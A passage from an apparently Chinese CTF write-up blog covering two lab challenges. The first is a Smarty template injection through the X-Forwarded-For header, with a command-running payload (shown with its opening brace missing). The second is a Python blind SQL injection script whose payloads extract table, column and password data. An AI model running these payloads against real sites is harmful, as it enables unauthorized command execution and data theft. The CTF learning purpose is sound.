[CISCN2019 华东南赛区]Web11
抓个包可以发现是 Smarty框架
在页面可以观察到 一个 XFF头, 可以猜测注入点就在这
通过 if 标签执行命令 ,读取flag
if system("cat /flag")}{/if}
[极客大挑战 2019]FinalSQL
一个登录框, 上面的提示应该就是要你盲注了
点一下那些数字会url上面有变化, /?id= , 应该就是注入点了
然后就是写脚本进行盲注了
学习一下别人的脚本:
import requests
import time
# url是随时更新的,具体的以做题时候的为准
url = 'http://1b56e0e9-cb22-45bf-98c0-87a739a6312c.node5.buuoj.cn:81/search.php?id='
i = 0
flag = ''
while True:
i += 1
# 从可打印字符开始
begin = 32
end = 126
tmp = (begin + end) // 2
while begin < end:
print(begin, tmp, end)
time.sleep(0.1)
# 爆数据库
# payload = "''or(ascii(substr(database(),%d,1))>%d)" % (i, tmp)
# 爆表
# payload = "''or(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))>%d)" % (i, tmp)
# 爆字段
# payload = "''or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='F1naI1y')),%d,1))>%d)" % (i, tmp)
# 爆flag 要跑很久
# payload = "''or(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, tmp)
# 爆flag 很快
payload = "''or(ascii(substr((select(password)from(F1naI1y)where(username='flag')),%d,1))>%d)" % (i, tmp)
# 错误示例
# payload = "''or(ascii(substr((select(GROUP_CONCAT(fl4gawsl))from(Flaaaaag)),%d,1))>%d)" % (i, tmp)
r = requests.get(url+payload)
if 'Click' in r.text:
begin = tmp + 1
tmp = (begin + end) // 2
else:
end = tmp
tmp = (begin + end) // 2
flag += chr(tmp)
print(flag)
if begin == 32:
break
https://blog.csdn.net/Chu_Jian_Xiong/article/details/109071522
扫一扫
569
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
